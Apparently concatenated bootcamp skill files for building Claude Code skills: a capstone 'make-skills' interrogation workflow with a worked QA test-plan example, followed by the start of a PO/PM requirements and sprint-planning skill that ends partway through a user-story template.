> - It **ASSEMBLES your answers into structured context** → that's augmentation (organizing information)
> - It **FEEDS that context to the AI for generation** → that's generation (producing the output)
>
> **You just built a RAG system.** Every skill is a RAG system.
>
> The AI completing patterns from your context? That's what an LLM does. Why does structured input work better? The model was trained by humans who rewarded that — that's RLHF. You've been doing all three intuitions since the first exercise of the prereq.
---
## Key Capabilities
### 1. Task Discovery Phase
Finds the repeated, valuable work you do weekly and turns it into a skill-able task:
- **Identification**: What task do you repeat at least weekly?
- **Walkthrough**: How do you do it today, step by step?
- **Context Gathering**: What information do you need before you start?
- **Quality Criteria**: What does good output look like? Bad output?
- **Audience**: Who uses what you create?
### 2. Pattern Extraction Phase
Discovers the underlying pattern in your task and maps it to a skill framework:
- **Category Mapping**: Code generation? Document creation? Analysis? Communication? Planning?
- **Context Requirements**: What does this skill always need to know?
- **Question Design**: What should the skill ask the user before generating?
- **Output Structure**: What template ensures consistent, high-quality output?
### 3. Skill Generation Phase
Assembles your answers into a production-ready skill file:
- **SKILL.md Generation**: Properly formatted markdown with metadata, interrogation questions, output specifications
- **Example Interrogation**: A complete worked example showing the skill in action
- **Generated Example Output**: Sample output that participants can reference
- **Integration Notes**: How this skill connects to bootcamp patterns (RAG, ReAct, etc.)
---
## Usage Scenarios
### Scenario A: Repeatable Document Creation
*Sales decks, RFP responses, project briefs, technical specs*
**When to use**: "I create [documents] at least weekly. Each one is different, but the process is the same."
**What you'll get**: A skill that interviews you about the document's purpose, audience, and context — then generates a properly structured template with all sections filled in.
### Scenario B: Code Generation or Migration
*New microservice scaffolding, API contract implementation, database migration planning*
**When to use**: "I build [code structures] repeatedly, always following the same patterns."
**What you'll get**: A skill that asks about your codebase, conventions, and constraints — then generates implementation plans or code stubs with your team's exact patterns.
### Scenario C: Analysis or Decision Support
*Technical architecture reviews, competitive analysis, feasibility assessments, incident post-mortems*
**When to use**: "I analyze [situations] and always produce similar-structured recommendations."
**What you'll get**: A skill that gathers context about the situation — then generates structured analysis with evaluation frameworks and recommendation matrices.
### Scenario D: Communication or Planning
*Meeting agendas, status reports, project proposals, email templates*
**When to use**: "I create [communications] regularly and want them to be more consistent."
**What you'll get**: A skill that asks about the message, audience, and context — then generates well-structured communications with the right tone and completeness.
---
## 3-Phase Workflow
### Phase 1: Task Discovery (15 min)
The skill interrogates you to understand your repeated work:
```
Q1: "What task do you repeat at least weekly at work?"
→ Example: "I create test plans for new features"
Q2: "Walk me through how you do it today, step by step."
→ Step 1: Review feature specification
→ Step 2: Identify test scenarios (happy path, edge cases, error cases)
→ Step 3: Write test cases for each scenario
→ Step 4: Document expected outcomes
→ Step 5: Review with development team
Q3: "What information do you need to gather before you start?"
→ Feature spec, API contracts, existing test data,
→ Known limitations, browser/OS requirements,
→ Performance requirements, security considerations
Q4: "What does GOOD output look like? Bad output?"
→ GOOD: Clear test cases, comprehensive scenarios,
→ prioritized by risk, reproducible steps
→ BAD: Vague scenarios, missing edge cases,
→ unclear expected outcomes, untestable
Q5: "Who is the audience for your output?"
→ Development team reads it to understand testing
→ QA team executes it
→ Project manager uses it to track testing progress
```
### Phase 2: Pattern Extraction (10 min)
The skill identifies the underlying pattern and asks how to structure it:
```
Q6: "Which category best describes your task?
• Code generation (scaffolding, migrations, implementations)
• Document creation (decks, specs, proposals, briefs)
• Analysis/decision (reviews, assessments, comparisons)
• Communication (emails, reports, announcements)
• Planning (agendas, roadmaps, schedules)"
→ Category: "Document creation"
(test plan is a structured document with specific sections)
Q7: "What context does the skill always need to know?
List 5-7 pieces of information that change every time but are always needed."
→ Feature specification, testing scope,
→ Team's testing standards, environment constraints,
→ Performance/security requirements, timeline,
→ Success criteria for testing
Q8: "What questions should the skill ask the user
before generating the output?
(Think: what do you always ask when someone
hands you a feature to test?)"
→ What's the feature being tested?
→ What are the main user flows?
→ What edge cases matter most?
→ What's the timeline for testing?
→ What environments are available?
Q9: "What structure should the output follow?
Describe section headings, ordering, format details."
→ ## Test Objectives
→ ## Scope (in-scope, out-of-scope)
→ ## Test Scenarios (matrix: happy path, edge cases, errors)
→ ## Test Cases (step-by-step for each scenario)
→ ## Success Criteria
→ ## Known Limitations
```
### Phase 3: Skill Generation (automatic)
The skill assembles your answers into a complete, formatted skill file:
```markdown
---
name: [generated from your task]
description: [generated from your answers]
version: 1.0
---
# [Your Skill Name]
## Overview
[Generated explanation of what this skill does]
## Key Capabilities
[Generated from Phase 2 answers]
## Usage Scenarios
[Generated categories where this skill applies]
## Structured Interrogation Framework
### Phase 1: [Context gathering]
[Your questions, adapted and refined]
### Phase 2: [Structure definition]
[Your output structure requirements]
## Output Format Specification
[Your template with examples]
## Example: Complete Workflow
[Worked example showing interrogation → output]
## Reflection: What You Just Built
[The RAG explanation]
```
---
## Structured Interrogation Framework
### Phase 1: Task Discovery (5-7 questions)
1. **Weekly Task**: What task do you repeat at least weekly?
2. **Current Process**: Walk me through your steps today (step-by-step)
3. **Input Requirements**: What information do you need before starting?
4. **Quality Definition**: What's GOOD output? What's BAD?
5. **Audience**: Who uses your output? How?
### Phase 2: Pattern Extraction (3-4 questions)
6. **Task Category**: Code generation, document creation, analysis, communication, or planning?
7. **Context Requirements**: What 5-7 pieces of information always change but are always needed?
8. **Question Design**: What questions should the skill ask to gather that context?
9. **Output Structure**: What sections, ordering, and format for the output?
### Phase 3: Skill Assembly (automatic)
10. **Formatting**: Converts your answers into proper skill YAML/markdown
11. **Example Generation**: Creates a worked example showing interrogation → output
12. **Integration Notes**: Explains how the skill connects to RAG, ReAct, bootcamp patterns
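Phase 3's assembly step is mechanical enough to sketch. The template and field names below are assumptions for illustration, not the bootcamp's actual generator: answers from Phases 1-2 get rendered into YAML frontmatter plus the standard skill sections.

```python
# Illustrative Phase 3 sketch: interrogation answers -> SKILL.md text.

def assemble_skill(name: str, description: str,
                   questions: list[str], sections: list[str]) -> str:
    """Render a skill file: frontmatter, interrogation, output spec."""
    frontmatter = f"---\nname: {name}\ndescription: {description}\nversion: 1.0\n---"
    interrogation = "\n".join(f"{i}. {q}" for i, q in enumerate(questions, 1))
    output_spec = "\n".join(f"## {s}" for s in sections)
    return (f"{frontmatter}\n# {name}\n"
            f"## Structured Interrogation Framework\n{interrogation}\n"
            f"## Output Format Specification\n{output_spec}\n")

skill = assemble_skill(
    name="test-plan-generator",
    description="Create test plans via interrogation-driven scope definition",
    questions=["What feature are you testing?", "What edge cases matter most?"],
    sections=["Test Objectives", "Scope", "Test Scenarios", "Success Criteria"],
)
print(skill)
```

The point of the sketch: once Phases 1-2 produce structured answers, Phase 3 is pure templating, which is why it can run automatically.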
---
## Output Format Specification
### Generated Skill Structure
```yaml
---
name: [Your-Task-Name]
description: [Your task interrogation-driven skill]
version: 1.0
---
# [Your Skill Name]
## Overview
[Purpose, target audience, core value]
## Key Capabilities
[What this skill does, derived from Phase 2 answers]
## Structured Interrogation Framework
### Context Assembly Questions
[Your questions, formatted as phase blocks]
## Output Format Specification
[Your output template with sections]
## Example: Complete Workflow
### Interrogation Phase
[Worked example of Q&A]
### Generated Output
[Sample output your skill would produce]
## Reflection: What You Built
[Explanation of RAG system structure]
```
---
## Example: Complete Workflow
### Scenario: QA Lead Building a "Test Plan Generation" Skill
**You say:**
```
I'm a QA Lead and I create test plans every week.
I want a skill that helps me generate them faster
and more consistently.
```
---
### Phase 1: Task Discovery
**Skill interrogates:**
```
Q1: What task do you repeat at least weekly?
→ "Creating test plans for new features.
I do this every sprint, sometimes 2-3 plans per week."
Q2: Walk me through how you do it today, step by step.
→ "Step 1: Read the feature specification
Step 2: Identify main user flows and happy paths
Step 3: List edge cases and error scenarios
Step 4: Define test cases (pre-conditions, steps, expected results)
Step 5: Estimate effort for each test case
Step 6: Create test data requirements
Step 7: Review with dev team to confirm scope
Step 8: Document known limitations
Step 9: Get stakeholder sign-off on scope"
Q3: What information do you need to gather before you start?
→ "Feature specification document
API contracts (if applicable)
User personas and use cases
Browser/platform requirements
Performance or load requirements
Security requirements
Existing test data and test environments
Team's testing standards (what counts as 'thorough')"
Q4: What does GOOD output look like? Bad output?
→ "GOOD:
- Clear objectives aligned to feature goals
- Comprehensive scenarios (happy path + edge cases + errors)
- Test cases with reproducible steps
- Clear expected outcomes
- Test cases prioritized by risk
- Known limitations documented
- Can be executed by any QA person
BAD:
- Vague test scenarios ('test the feature')
- Missing edge cases
- Unclear expected outcomes
- No priority or risk indication
- Can't be executed without asking author
- Covers only happy path"
Q5: Who is the audience for your output?
→ "Primary: My QA team (5 people) who execute the tests
Secondary: Development team (needs to understand test scope)
Tertiary: Project manager (tracks testing progress)"
```
---
### Phase 2: Pattern Extraction
**Skill interrogates:**
```
Q6: Which category best describes your task?
→ "Document creation — test plans are structured
technical documents with specific sections"
Q7: What context does the skill always need to know?
→ "1. Feature specification (what are we testing?)
2. Testing scope boundaries (in/out of scope)
3. User flows and personas
4. Platform/environment constraints
5. Performance or security requirements
6. Available test data and test environments
7. Team's testing standards"
Q8: What questions should the skill ask the user?
→ "When I get a feature to test, I always ask:
- What's the core feature we're testing?
- What are the main user flows?
- What edge cases are most important?
- What error scenarios matter?
- What's the timeline for testing?
- What environments do we have?
- What's known about performance/security needs?
- Are there similar features we can reference?"
Q9: What structure should the output follow?
→ "## Test Plan: [Feature Name]
### Test Objectives
- What we're validating
### Scope
- In-scope test areas
- Out-of-scope (explicitly)
### Test Scenarios
(Matrix table: Feature area | Happy Path | Edge Cases | Error Cases)
### Test Cases
For each scenario:
- Pre-conditions
- Step 1, 2, 3... (reproducible)
- Expected outcome
- Priority (P0, P1, P2)
### Test Data Requirements
- What data do we need?
### Success Criteria
- What does passing look like?
### Known Limitations
- What can't we test?
### Sign-Off
- Stakeholders agree to scope"
```
---
### Phase 3: Skill Generation
**The skill generates a complete SKILL.md file:**
```markdown
---
name: test-plan-generator
description: Create comprehensive test plans for new features using interrogation-driven scope definition
version: 1.0
---
# Test Plan Generator Skill
## Overview
The **Test Plan Generator** helps QA leads and testers create comprehensive,
well-scoped test plans for new features. Instead of starting from a blank page,
the skill interrogates you about the feature, generates a structured test plan,
and ensures nothing is missed.
This skill demonstrates all three bootcamp intuitions:
1. **Context is everything** — Before generating a test plan, it asks about
the feature, constraints, audience, and testing standards
2. **Structure gets rewarded** — Output is a properly formatted test plan with
clear sections, test scenarios, and success criteria
3. **You are the retrieval system** — The skill asks the questions YOUR team
always asks, capturing your testing expertise
## Key Capabilities
- **Feature Context Gathering**: Understand feature specifications, user flows, edge cases
- **Scope Definition**: Explicit in-scope and out-of-scope boundaries
- **Test Scenario Generation**: Happy path, edge cases, error scenarios in a matrix
- **Test Case Creation**: Step-by-step reproducible test cases with expected outcomes
- **Effort Estimation**: Risk-based prioritization (P0, P1, P2)
- **Stakeholder Alignment**: Built-in sign-off and known limitations
## Structured Interrogation Framework
### Phase 1: Feature Context (5 questions)
1. **Feature Name & Purpose**: What feature are you testing?
2. **User Flows**: What are the main user journeys through this feature?
3. **Edge Cases**: What edge cases matter most for this feature?
4. **Constraints**: What environment, platform, or performance constraints exist?
5. **Scope Boundaries**: What's explicitly OUT of scope?
### Phase 2: Test Strategy (4 questions)
6. **Test Objectives**: What are you validating? (Functionality? Performance? Security?)
7. **Test Scenarios**: What scenarios do you need to cover?
- [ ] Happy path
- [ ] Edge cases
- [ ] Error handling
- [ ] Performance/load
- [ ] Security (if applicable)
8. **Test Data**: What test data do you need?
9. **Success Criteria**: How will you know the feature works?
## Output Format Specification
```markdown
# Test Plan: [Feature Name]
## Test Objectives
- Validate [core functionality]
- Ensure [user flow] works correctly
- Confirm [error handling] behavior
## Scope
### In-Scope
- [ ] User registration flow
- [ ] Login functionality
- [ ] Password reset
- [ ] User profile updates
### Out-of-Scope
- [ ] Advanced analytics
- [ ] Historical data migration
- [ ] Internationalization (phase 2)
## Test Scenarios
| Feature Area | Happy Path | Edge Cases | Error Cases |
|--------------|-----------|-----------|-------------|
| Registration | Valid email, new user | Existing email, special chars | Invalid email format |
| Login | Valid credentials | Case sensitivity, spaces | Wrong password, locked account |
| Reset Password | Email exists | Email case variations | Email not found |
## Test Cases
### Scenario: User Registration (Happy Path)
**Test Case 1.1: Register with valid email**
- Pre-condition: User has never registered
- Steps:
1. Navigate to registration page
2. Enter email: test@example.com
3. Enter password: ValidPass123!
4. Click "Register"
- Expected: Account created, redirected to dashboard
**Test Case 1.2: Validate email format**
- Pre-condition: Registration page open
- Steps:
1. Enter email: not-an-email
2. Click "Register"
- Expected: Error message: "Please enter a valid email"
### Scenario: Login (Happy Path)
**Test Case 2.1: Login with correct credentials**
- Pre-condition: Account exists with email test@example.com, password ValidPass123!
- Steps:
1. Navigate to login page
2. Enter email: test@example.com
3. Enter password: ValidPass123!
4. Click "Login"
- Expected: Redirected to dashboard, session created, name displayed
**Test Case 2.2: Login with wrong password**
- Pre-condition: Account exists, user not logged in
- Steps:
1. Enter email: test@example.com
2. Enter password: WrongPass123!
3. Click "Login"
- Expected: Error message: "Invalid email or password"
- Priority: P1
## Test Data Requirements
- Email account: test@example.com / ValidPass123!
- Email account: second@example.com / TestPass456!
- Test database with 100 sample users
- Staging environment with current feature code
## Success Criteria
- [ ] All P0 test cases pass
- [ ] All P1 test cases pass
- [ ] Error messages clear and actionable
- [ ] Login/logout flow works end-to-end
- [ ] No console errors or warnings
## Known Limitations
- **Out of scope for this test plan**: Load testing (separate performance testing)
- **Assumption**: Email service is working (not testing email delivery)
- **Browser coverage**: Chrome/Firefox only (Safari tested separately)
- **Not covered**: 3rd-party authentication (OAuth tested in integration suite)
## Sign-Off
| Role | Name | Date | Approved |
|------|------|------|----------|
| Dev Lead | [Dev Lead Name] | | ☐ |
| Product Manager | [PM Name] | | ☐ |
| QA Lead | [Your Name] | | ☐ |
---
## The Reflection: What You Just Built
Look at what you just created:
- It **ASKS questions** → Questions 1-9 are retrieval. They gather the specific context about YOUR feature, YOUR constraints, YOUR team
- It **ASSEMBLES your answers into structured context** → The interrogation responses get organized into a structured format (scenarios, test cases, data requirements)
- It **FEEDS that context to generation** → A test plan engine could take those structured answers and produce the test plan
**You just built a RAG system.**
Every skill is a RAG system:
- **Retrieval**: The interrogation questions fetch relevant context from your knowledge
- **Augmentation**: Your answers get organized into structured format
- **Generation**: The structured format becomes a test plan any team member can execute
The AI completing patterns? That's what an LLM does. Why does this structured approach work so much better than "write me a test plan"? The LLM was trained by humans who rewarded clear, structured, specific inputs — that's RLHF. You've been doing all three (retrieval, augmentation, generation) since the first bootcamp exercise.
```
---
### What The Participant Now Has
A complete, formatted skill file they can save to their Claude Code skills library and use immediately:
```bash
# They save it as:
~/.claude-code/skills/test-plan-generator/SKILL.md
# Or reference it in a Claude Code project
# And use it like any other skill in the bootcamp
```
---
## Design Principles
### Principle 1: Task Discovery is Non-Negotiable
Never skip Phase 1. The quality of Phase 3 (the generated skill) depends entirely on how well you understand your own task. A vaguely understood task produces a vague skill, and a vague skill produces vague prompts.
### Principle 2: Your Expertise is the Content
The skill isn't generic — it captures YOUR process, YOUR team's standards, YOUR audience. Generic skills fail because they don't match your reality.
### Principle 3: Pattern Extraction Reveals Structure
Many people don't realize the patterns in their work until interrogated. The questions force you to articulate what's implicit.
### Principle 4: The Generated Skill is Just the Beginning
The skill file you generate is your starting point. You'll refine it as you use it: adding examples and adjusting questions based on what you learn.
---
## Integration with Bootcamp Patterns
### How Make-Skills Ties Everything Together
**Priority Builder Pattern** (ABCD):
- **Action**: Your weekly task (the skill you're building)
- **Behavior**: The questions you ask (structured interrogation)
- **Context**: The information you always need (assembled by Phase 2)
- **Delivered**: The skill file (production-ready artifact)
**ReAct Pattern** (THINK → ACT → OBSERVE):
The skill itself uses ReAct:
- **THINK**: What questions do I need to ask? (Phase 1-2)
- **ACT**: Ask them and gather answers (interaction)
- **OBSERVE**: Generate the skill file and verify it makes sense (Phase 3)
**RAG System** (Retrieval, Augmentation, Generation):
The culmination of everything:
- **Retrieval**: Questions fetch context (what you know about your task)
- **Augmentation**: Answers get structured (organized into sections)
- **Generation**: Structure becomes artifact (skill file or output)
**Context is Everything Intuition**:
The entire workflow is about context — discovering it, mapping it, and encoding it into a skill that can access it later.
**Structure Gets Rewarded Intuition**:
The output is never prose — it's always formatted skill files, interrogation frameworks, matrices. That structure is why it works.
**You Are the Retrieval System Intuition**:
The skill you build IS a retrieval system. It retrieves your expertise about your task, augments it into structure, and generates outputs your team can use.
---
## Advanced Usage: Skill Composition
Once you have a few skills, you can **compose them**:
```
Skill A: "Generate technical specification"
Skill B: "Create implementation plan"
Skill C: "Design test strategy"
Composed Workflow:
1. Use Skill A to generate spec for new feature
2. Feed that spec's output to Skill B
3. Feed that plan's output to Skill C
4. Now you have spec + plan + tests, all coherent
```
The more skills you build, the more you can chain them for complex workflows.
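The composed workflow above is just function composition: each skill maps context to an artifact, and that artifact is the next skill's context. A minimal sketch, where the three skill functions are stand-ins rather than real implementations:

```python
from typing import Callable

# A skill, abstractly: context in, artifact out.
Skill = Callable[[str], str]

def generate_spec(feature: str) -> str:
    return f"SPEC for {feature}"

def generate_plan(spec: str) -> str:
    return f"PLAN from ({spec})"

def generate_tests(plan: str) -> str:
    return f"TESTS from ({plan})"

def compose(*skills: Skill) -> Skill:
    """Chain skills left to right: each output feeds the next input."""
    def pipeline(context: str) -> str:
        for skill in skills:
            context = skill(context)
        return context
    return pipeline

workflow = compose(generate_spec, generate_plan, generate_tests)
print(workflow("checkout flow"))
# -> TESTS from (PLAN from (SPEC for checkout flow))
```

Because every skill shares the same shape (context in, artifact out), any chain of them stays coherent: the test strategy is derived from the plan, which is derived from the spec.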
---
## When to Build a Skill
### Build a Skill If:
- ✅ You do this task at least weekly
- ✅ The output matters (affects others)
- ✅ It takes 30+ minutes
- ✅ You always gather the same information
- ✅ You want it more consistent
- ✅ Others could use it too
### Skip Skills If:
- ❌ You do it once per quarter (too infrequent)
- ❌ The output is just for you (lower ROI)
- ❌ It takes 2 minutes (IDE/templates work fine)
- ❌ The process changes dramatically each time
- ❌ It's already fully automated
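The build/skip checklist is a decision procedure, so it can be sketched as one. The thresholds below are illustrative judgment calls taken from the lists above, not bootcamp rules:

```python
# The build-a-skill checklist as a simple predicate (thresholds illustrative).

def should_build_skill(*, weekly: bool, output_affects_others: bool,
                       minutes_per_run: int, same_inputs_each_time: bool,
                       fully_automated: bool) -> bool:
    """Return True only when the task clears every build criterion."""
    if fully_automated or not weekly:
        return False            # too infrequent, or already automated
    if minutes_per_run < 30:
        return False            # templates/IDE snippets work fine
    return output_affects_others and same_inputs_each_time

# Weekly test-plan writing that the whole team consumes: worth a skill.
print(should_build_skill(weekly=True, output_affects_others=True,
                         minutes_per_run=45, same_inputs_each_time=True,
                         fully_automated=False))   # -> True
```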
---
## FAQ for Capstone Learners
**Q: Will the generated skill be perfect?**
A: No. It's your starting point. You'll refine it as you use it, adjust questions, improve output templates. That's normal.
**Q: Can I build a skill for something non-work?**
A: Absolutely! Recipe generation, travel planning, gift recommendation — anything with a repeatable process.
**Q: What if I can't articulate my process clearly?**
A: That's what the interrogation does. The skill will help you think through it step-by-step.
**Q: Can I combine two tasks into one skill?**
A: Only if they're truly the same process with different contexts. Otherwise, split them — two focused skills beat one bloated one.
**Q: How long until I'm confident building skills?**
A: After your first 2-3 skills, the pattern becomes obvious. By skill 5-6, you'll be able to design them in your head.
**Q: Can I share my skills with my team?**
A: Yes! If your skill captures team expertise, your team can use it. Over time, you'll have a library of organizational skills.
**Q: What if my skill doesn't work as expected?**
A: Debug it like code: Test with different inputs, check the interrogation questions, refine the output template. Iteration is normal.
**Q: Is there a format for advanced use cases (like multi-stage pipelines)?**
A: Yes, but start with the basic 3-phase format. Once you're comfortable, you can extend it.
---
## Bootcamp Integration
### For Participants
**This skill is:**
- ✅ The capstone exercise of the bootcamp
- ✅ A meta-demonstration of interrogation at the skill-level
- ✅ The moment you become a skill creator, not just a user
- ✅ Your first tool for scaling your expertise
**Use this skill when:**
- You finish all prerequisite skills and patterns
- You've seen 3-4 example skills (dev-second-brain, etc.)
- You want to automate your own repeated work
- You're ready to build organizational capability
**Expected outcome:**
- Generate a complete, usable skill file
- Understand RAG at a deep level (you built one)
- Start thinking about your work as "patterns to automate"
- Join the community of skill creators
### For Facilitators
**Introduce in:**
- Final session of bootcamp (Session 3 or later)
- Post-bootcamp office hours (perfect for 1-on-1 coaching)
- Advanced track materials
**Teaching approach:**
1. **Show the framework** (3 phases, interrogation questions)
2. **Walk through the example** (QA Lead building test-plan-generator)
3. **Have participants do Phase 1** (find their task, walk through it)
4. **Guide Phase 2** (help them extract patterns)
5. **Generate Phase 3** (show them their skill file)
6. **The reflection** (explain what they just built)
**Expected time:**
- Simple skill (document template): 30 minutes
- Moderate skill (test planning, code generation): 45 minutes
- Complex skill (architecture analysis, multi-stage workflow): 60+ minutes
---
## Example Skills Participants Have Built
### From Past Bootcamp Cohorts:
- **Sales Deck Generator** (Sales team) — interrogates about product, audience, pricing, differentiators → generates sales deck outline
- **Technical Specification Writer** (Engineering team) — interrogates about feature, stakeholders, constraints → generates spec template
- **Meeting Facilitator** (Management) — interrogates about meeting goal, attendees, outcomes → generates agenda + discussion guide
- **Code Review Checklist Generator** (QA/Dev team) — interrogates about codebase, tech stack, risks → generates custom review checklist
- **Customer Interview Template** (Product) — interrogates about research goals, user segment, hypotheses → generates interview guide
- **Incident Post-Mortem Facilitator** (DevOps) — interrogates about incident severity, systems affected, timeline → generates post-mortem structure
---
## Files in This Skill
- `SKILL.md` — Complete skill definition and usage guide (this file)
- `README.md` — Quick-start guide for bootcamp participants
---
## References
### Bootcamp Patterns Used
- **Priority Builder**: ABCD framework for structured thinking
- **ReAct**: Reasoning + Acting pattern
- **RAG System**: Retrieval, Augmentation, Generation paradigm
- **Interrogation Workflow**: Questions before answers
### Academic References
- Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
- Lewis et al. (2020) "Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks"
- Brown et al. (2020) "Language Models are Few-Shot Learners"
---
**Version**: 1.0
**Status**: Production-ready for bootcamp capstone
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2 — Capstone Track
---
## Quick Start
1. **Choose a task** you repeat weekly
2. **Answer the Phase 1 discovery questions** (5 min)
3. **Extract the pattern** in Phase 2 (5 min)
4. **Get your generated skill file** (automatic)
5. **Read the reflection** section to understand what you built
6. **Save and use it** with your Claude Code or share with your team
---
# skills-po-second-brain.md
# https://jrlopez.dev/p/skills-po-second-brain.md
---
name: po-second-brain
description: PO/PM second brain — interrogation-driven requirements capture, sprint planning, and stakeholder communication using systematic patterns
version: 1.0
---
# PO/PM Second Brain Skill
## Overview
The **PO/PM Second Brain** is an expert assistant that guides Product Owners and Project Managers through complex planning and communication challenges using three bootcamp intuitions:
1. **Context is everything** — Gathers rich context about stakeholders, constraints, and success criteria before generating requirements
2. **Structure gets rewarded** — Uses structured output (user stories, roadmaps, reports) instead of loose narrative
3. **You are the retrieval system** — Acts as an automated knowledge retrieval system for project context and team alignment
This skill enables POs/PMs to tackle:
- ✅ Requirements capture (turning conversations into structured stories)
- ✅ Sprint planning (breaking epics into stories with estimates)
- ✅ Stakeholder communication (status reports, steering decks, escalations)
- ✅ Roadmap planning (prioritization using value/effort/risk framework)
---
## Key Capabilities
### 1. Interrogation-Driven Workflow
Gathers structured context before generating requirements using a **25-question-style interview** adapted for POs/PMs:
- **Stakeholder Context**: Business goals, success definition, key stakeholders
- **Project Scope**: Epics, features, must-haves vs. nice-to-haves
- **Constraints**: Timeline, budget, team capacity, dependencies
- **Team Composition**: Team size, experience level, existing patterns
- **Risk & Acceptance**: Known risks, acceptance criteria patterns, validation approach
### 2. Spec-Kit Methodology
Generates requirements and plans using **Knowledge → Specification → Plan → Execution**:
```
Knowledge: What do we know about the problem? (From interrogation)
Specification: What are we building? (User stories, acceptance criteria)
Plan: How will we build it? (Roadmap, sprint breakdown, timeline)
Execution: Who does what, when? (Task assignments, dependencies)
```
### 3. Structured Output Formats
- **User Stories**: Title, acceptance criteria (Given/When/Then), story points, dependencies
- **Sprint Backlog**: Stories with estimates, priorities, capacity planning
- **Stakeholder Report**: Executive summary, progress, risks, asks with clear ownership
- **Prioritized Roadmap**: Ranked features with rationale (value/effort/risk scores)
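The user-story format above (title, Given/When/Then acceptance criteria, points, dependencies) can be sketched as a data structure so those pieces travel together. Field names here are assumptions based on the format described, not a defined schema:

```python
from dataclasses import dataclass, field

@dataclass
class AcceptanceCriterion:
    """One Given/When/Then acceptance criterion."""
    given: str
    when: str
    then: str

    def render(self) -> str:
        return f"Given {self.given}, when {self.when}, then {self.then}."

@dataclass
class UserStory:
    title: str
    points: int
    criteria: list[AcceptanceCriterion] = field(default_factory=list)
    dependencies: list[str] = field(default_factory=list)

story = UserStory(
    title="User can reset password",
    points=3,
    criteria=[AcceptanceCriterion(
        given="a registered user on the login page",
        when="they request a password reset",
        then="a reset link is emailed within 5 minutes",
    )],
    dependencies=["email-service"],
)
print(story.criteria[0].render())
```

Keeping criteria structured (rather than prose) is what lets the skill check that every story has at least one testable acceptance criterion before it lands in a sprint backlog.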
---
## Usage Scenarios
Choose the scenario matching your current task:
### **Scenario A: Requirements Capture**
*Turning stakeholder conversations into structured user stories with acceptance criteria*
**When to use**: "We need to document requirements for our new feature"
**What you'll get**: User stories with acceptance criteria, priority ranking, dependency mapping, edge cases identified
### **Scenario B: Sprint Planning**
*Breaking epics into stories, estimating, identifying dependencies*
**When to use**: "Help me plan the next 2-week sprint"
**What you'll get**: Sprint backlog with estimates, capacity check, dependency graph, burn-down projections
### **Scenario C: Stakeholder Communication**
*Status reports, steering committee decks, risk escalations*
**When to use**: "I need a status report for exec leadership"
**What you'll get**: Executive summary, progress metrics, risks with mitigation, asks with clear impact statements
### **Scenario D: Roadmap Planning**
*Feature prioritization using value/effort/risk framework*
**When to use**: "We have 15 features to prioritize for Q2-Q3"
**What you'll get**: Ranked roadmap with rationale, resource allocation, timeline projections, risk adjustments
---
## Structured Interrogation Framework
The skill will ask you these questions to build context:
### Phase 1: Business Context (6-8 questions)
1. **Company/Product**: What are we building? (SaaS, internal tool, mobile app, etc.)
2. **Business Goal**: What's the north star metric? (Revenue, retention, cost savings, efficiency?)
3. **Current State**: How is this done today? (Manual process, competitor, legacy system?)
4. **Success Definition**: How will we know this is successful? (Metrics, adoption, feedback?)
5. **Stakeholders**: Who are the key stakeholders? (Executive sponsor, users, customers, team leads?)
6. **Timeline**: When do we need this? (Hard deadline, flexible, market window?)
### Phase 2: Scope & Requirements (5-7 questions)
7. **Scope Statement**: What's in scope, what's out? (MVP vs. future features?)
8. **Primary Users**: Who are the primary users? (Customer, internal, both?)
9. **Key Workflows**: What are 3-4 critical user flows? (Signup, payment, reporting, etc.)
10. **Constraints**: What's non-negotiable? (Technology, budget, team size, compliance?)
11. **Dependencies**: What other projects/systems does this depend on?
12. **Known Unknowns**: What risks or uncertainties exist?
### Phase 3: Team & Capacity (3-4 questions)
13. **Team Size**: How many developers, designers, QA? What's the team composition?
14. **Team Experience**: What's your team's experience with this domain?
15. **Existing Patterns**: What design patterns, tech stack does the team use?
16. **Velocity**: What's your typical sprint velocity? (Story points, features per sprint?)
### Phase 4: Acceptance & Validation (3-4 questions)
17. **Acceptance Criteria Style**: Do you use Given/When/Then, checklist, or other format?
18. **Definition of Done**: What makes a story "done"? (Code review, tests, deployment, user validation?)
19. **Validation Approach**: How will stakeholders validate completion? (Demo, metrics, user testing?)
20. **Rollback Plan**: What's your safety net if something doesn't work?
### Phase 5: Knowledge & Decisions (2-3 questions)
21. **Decision Constraints**: Are there decisions that limit options? (Platform choices, compliance, etc.)
22. **Tribal Knowledge**: What do you wish every PM knew about this project?
23. **Competitive Intel**: How do competitors handle this? Any lessons learned?
---
## Output Format Specification
### 1. User Story with Acceptance Criteria
```markdown
## User Story: [Feature Title]
**Story ID**: PROJ-123
**Sprint**: Q2 Sprint 2
**Priority**: High
**Estimate**: 8 points
**Owner**: [Team member]
### Description
As a [user type], I want to [action], so that [benefit].
**Example**: As a **customer**, I want to **schedule a meeting with a sales rep**, so that **I can get personalized help without waiting**.
### Acceptance Criteria
Given the customer is on the Products page
When they click "Schedule Demo"
Then they see a calendar picker for available time slots
Given the customer selects a time slot
When they submit the form
Then an email confirmation is sent to them and their customer success rep
Given a customer tries to book outside business hours
When they submit
Then they see an error message and are offered the next available slot
### Edge Cases
- What if no time slots are available? (Show "Book a callback" form instead)
- What if customer's timezone is different? (Show times in their timezone)
- What if the sales rep's calendar is unavailable? (Auto-select next available rep)
### Dependencies
- Requires Calendar service integration (tracked in PROJ-456)
- Requires email notification system (existing)
### Success Criteria
- [ ] Calendar integration working end-to-end
- [ ] Email confirmations sent within 1 minute
- [ ] 80% of customers book within first 2 weeks
- [ ] No more than 5% booking errors
```
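A Given/When/Then criterion maps almost line-for-line onto an automated test. The sketch below translates two of the booking criteria above into plain-assert test functions; `schedule_demo` and its return shape are hypothetical stand-ins, not a real API:

```python
# Hypothetical stand-in for the booking flow described above.
BUSINESS_HOURS = range(9, 17)  # bookable slots: 9:00-16:59

def schedule_demo(hour):
    """Toy scheduler: confirms in-hours bookings, rejects the rest."""
    if hour in BUSINESS_HOURS:
        return {"status": "confirmed", "email_sent": True}
    return {"status": "error", "next_available": min(BUSINESS_HOURS)}

def test_in_hours_booking_sends_confirmation():
    # Given the customer selects a time slot / When they submit the form
    result = schedule_demo(hour=10)
    # Then an email confirmation is sent
    assert result["status"] == "confirmed" and result["email_sent"]

def test_out_of_hours_booking_offers_next_slot():
    # Given a customer tries to book outside business hours / When they submit
    result = schedule_demo(hour=22)
    # Then they see an error and are offered the next available slot
    assert result["status"] == "error"
    assert result["next_available"] == 9
```

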